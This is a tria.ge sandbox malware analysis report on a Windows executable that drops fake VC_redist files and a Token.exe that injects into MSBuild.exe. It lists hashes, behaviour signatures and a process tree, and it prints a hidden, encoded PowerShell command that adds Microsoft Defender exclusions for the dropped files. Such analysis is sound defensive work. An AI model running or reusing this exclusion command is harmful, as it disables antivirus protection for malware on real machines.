Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250211-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/02/2025, 19:56

General

  • Target

    95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe

  • Size

    3.8MB

  • MD5

    3db1c66a1e51f7c1e258b1c12205a435

  • SHA1

    98e24a9ea6e7c38a95543c89a037c7f3f7b1591c

  • SHA256

    95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2

  • SHA512

    7bec8f484f8f047d84d6f703853a56cbffa061ab22813e9449fa78382a88d9f42a27eb1f999e1e7ab30597afb49e2ff5c23f65654c4584fc75d1c2835607a407

  • SSDEEP

    98304:ZsFwe8EuILKpQN0d7aePKtGBz/smtrm+2f/VSnGIm+LR4ZzK:FEoO01aFGBz/sYK+2fIGImy

Malware Config

Signatures

  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe
    "C:\Users\Admin\AppData\Local\Temp\95b7a961a634c972681d935cf4f78150c0e2f0d962daa3daf59c3fd3af714db2.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4940
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"
      2⤵
      • Enumerates VirtualBox registry keys
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:4520
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAEQALQBtAFAAcAByAGUAZgBlAFIARQBOAEMAZQAgAC0AZQB4AEMAbAB1AFMAaQBvAE4AcABhAHQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAcABlAGMAaQBhAGwATgBhAG0AZQBcAFQAbwBrAGUAbgAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBFADsAIABhAGQARAAtAG0AUABwAFIAZQBmAEUAcgBlAG4AYwBFACAALQBlAHgAQwBMAFUAUwBJAE8ATgBQAHIAbwBjAGUAcwBTACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASQBzAFMAcABlAGMAaQBhAGwATgBhAG0AZQBcAFQAbwBrAGUAbgAuAGUAeABlACAALQBGAG8AUgBDAGUA
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4696
  • C:\Users\Admin\AppData\Roaming\IsSpecialName\Token.exe
    C:\Users\Admin\AppData\Roaming\IsSpecialName\Token.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5512
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OTI0REQyNUItOUMyMS00NkU3LUFCNEItNzJFMkUzRDBBMzI0fSIgdXNlcmlkPSJ7NTE4MjAyRkYtMDcwRC00REVGLUI5MDEtNTUxMkUwM0EwRjdDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7ODA3NERDQzgtNTExNi00RDZBLUExMTMtQzAwNTE5MEFEODExfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODM0MTAiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NTUzNjg2NzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MjExNzY3MTI2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    PID:5316

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe

    Filesize

    653KB

    MD5

    4f6e118ff053bda4f358922e704e6e2d

    SHA1

    b09ee9ecb9b16910e7d5b0b151095655eac86666

    SHA256

    c4d8a65844301bbe75699e5de0d2a576f1fa07e0cf259810bdc68b045cb14225

    SHA512

    a78fb7027e39f29cb768cd0f6ed11ab4e56179b04b782f0f293fe0743fc88e418da8ea9698d78ff462cb650694fc4a14003537f4decb0db6313061a1afa25b4c

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe

    Filesize

    8.2MB

    MD5

    95a8e03433879dc9bbe059a6f8ba3f5c

    SHA1

    9b15abecbc64573f9709847e22c2006a2bfec327

    SHA256

    c09055cde3e0d6c5ebad2cf79f3e735c3ce5f5ded864130098fe2c4165b99fa1

    SHA512

    3d1d9c0e77085258bfb834ca5d65e6aaad3a3a3a426cda50f2a6b99ad03c65b83f25a853a3a8c900aa01fe17e0a741b73bf20364006d1a16a5c21356095c49c5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t2rkvobx.slk.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4696-2810-0x00000137AB2C0000-0x00000137AB2E2000-memory.dmp

    Filesize

    136KB

  • memory/4940-47-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-35-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-33-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-59-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-83-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-81-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-79-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-77-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-75-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-73-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-71-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-69-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-67-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-65-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-63-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-57-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-55-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-37-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-19-0x00007FFB80060000-0x00007FFB80B21000-memory.dmp

    Filesize

    10.8MB

  • memory/4940-45-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-31-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-39-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-53-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-61-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-51-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-49-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-43-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-41-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-29-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-27-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-25-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-23-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-21-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-20-0x0000021936D30000-0x0000021936E36000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-2803-0x000002191E590000-0x000002191E5DC000-memory.dmp

    Filesize

    304KB

  • memory/4940-2802-0x000002191CCE0000-0x000002191CD36000-memory.dmp

    Filesize

    344KB

  • memory/4940-2804-0x000002191E5E0000-0x000002191E634000-memory.dmp

    Filesize

    336KB

  • memory/4940-18-0x0000021936D30000-0x0000021936E3A000-memory.dmp

    Filesize

    1.0MB

  • memory/4940-17-0x000002191C750000-0x000002191C7F8000-memory.dmp

    Filesize

    672KB

  • memory/4940-2817-0x00007FFB80063000-0x00007FFB80065000-memory.dmp

    Filesize

    8KB

  • memory/4940-2818-0x00007FFB80060000-0x00007FFB80B21000-memory.dmp

    Filesize

    10.8MB

  • memory/4940-2822-0x00007FFB80060000-0x00007FFB80B21000-memory.dmp

    Filesize

    10.8MB

  • memory/4940-16-0x00007FFB80063000-0x00007FFB80065000-memory.dmp

    Filesize

    8KB